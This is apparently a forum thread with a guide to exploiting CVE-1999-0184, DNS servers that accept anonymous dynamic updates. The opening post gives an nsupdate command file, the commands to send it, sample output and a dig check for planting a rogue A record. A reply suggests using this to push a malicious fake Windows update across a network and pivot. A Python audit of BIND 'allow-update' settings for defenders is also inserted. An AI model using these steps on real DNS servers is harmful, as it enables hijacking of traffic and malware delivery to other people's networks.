Exploiting CVE-1999-0184 DNS Poisoning

AnarchyAngel
« on: December 10, 2015, 02:12:33 am »
Yes, this CVE is old, but I keep seeing it and there are no real tools or exploit guides available, so I thought I would make one up right quick.

This "guide" is for Kali 2, and the basics of what's going on is that the target DNS server allows anonymous DNS updates. The one tool we will need is nsupdate. If it's not already on your system, you can just run apt.
Code:
apt-get install dnsutils
Now we will need to start with a file that has all our commands in it. It should look something like this:
Code:
server 1.2.3.4 #our target DNS server
zone corp.company.com #the zone we are working in.
update delete evil.corp.company.com. A #rm just in case.
update add evil.corp.company.com. 86400 IN A 2.2.2.2
show
send
Save the file as dns. Now just run the following command:
Code:
nsupdate -v dns
nsupdate should read all the commands in the dns file and send them to our target DNS server. After a few seconds you should see something similar to this:
Code:
Outgoing update query:
;; ->>HEADER<<- opcode: UPDATE, status: NOERROR, id:
;; flags:; ZONE: 0, PREREQ: 0, UPDATE: 0, ADDITIONAL: 0
;; ZONE SECTION:
;corp.company.com.  IN SOA

;; UPDATE SECTION:
evil.corp.company.com. 0 ANY A
evil.corp.company.com. 86400 IN A 2.2.2.2
Now just run a quick DiG query to make sure it worked.
Code:
dig @1.2.3.4 A evil.corp.company.com
That is all I have for this post. Happy hacking :)

OP: http://aahideaway.blogspot.com/2015/12/exploiting-cve-1999-0184-dns-poisoning.html
https://dc414.org - MKE area DEFCON group
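
From the defender's side, the condition this thread relies on (a zone that accepts unsigned dynamic updates) is visible in the server's configuration. The following is an added example, not part of the original posts: a Python audit of BIND `named.conf` zone stanzas. It assumes the server is BIND and that update permissions are set per zone with `allow-update` (it does not evaluate `update-policy` or options-level defaults); the sample configuration, the key name `ddns-key` and the zone names other than corp.company.com are constructed.

```python
import re

# Constructed named.conf fragment for the example (not from the post).
SAMPLE_CONF = '''
zone "corp.company.com" {
    type master;
    allow-update { any; };            // anyone may send UPDATE
};
zone "lab.company.com" {
    type master;
    allow-update { 10.1.2.0/24; };    # source address only
};
zone "safe.company.com" {
    type master;
    allow-update { key "ddns-key"; }; /* TSIG-signed updates only */
};
zone "static.company.com" { type master; };
'''

def strip_comments(text):
    """Remove /* */, // and # comments, all of which named.conf accepts."""
    text = re.sub(r'/\*.*?\*/', '', text, flags=re.S)
    return re.sub(r'(//|#)[^\n]*', '', text)

def zone_body(conf, start):
    """Return the text from `start` (just past '{') to the matching '}'."""
    depth, i = 1, start
    while depth and i < len(conf):
        depth += {'{': 1, '}': -1}.get(conf[i], 0)
        i += 1
    return conf[start:i - 1]

def audit_zones(conf):
    """Map each zone name to a verdict on who may send dynamic updates."""
    conf, verdicts = strip_comments(conf), {}
    for m in re.finditer(r'zone\s+"([^"]+)"[^{;]*\{', conf):
        body = zone_body(conf, m.end())
        acl = re.search(r'allow-update\s*\{([^}]*)\}', body)
        items = [e.strip() for e in acl.group(1).split(';') if e.strip()] if acl else []
        if 'any' in items:
            verdict = 'FAIL: anonymous updates accepted'
        elif any(not e.startswith('key ') and e != 'none' for e in items):
            # The match list is an OR: one address entry bypasses the key.
            verdict = 'WARN: address-only match, no TSIG key required'
        elif items and items != ['none']:
            verdict = 'OK: TSIG key required'
        else:
            verdict = 'OK: allow-update absent or none'
        verdicts[m.group(1)] = verdict
    return verdicts
```

Zones reported as FAIL or WARN should be changed to `allow-update { key ...; }` or an `update-policy` so that every update must be TSIG-signed.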

Pandles7
Re: Exploiting CVE-1999-0184 DNS Poisoning
« Reply #1 on: February 29, 2016, 12:00:01 am »
Nice, I used another script-kiddie tool for this. I heard that you could fake an update to make all the Windows computers on your network download your malicious "update". Pretty interesting; this could also be used if you've infected one machine and use it as a pivot to infect the rest of the network.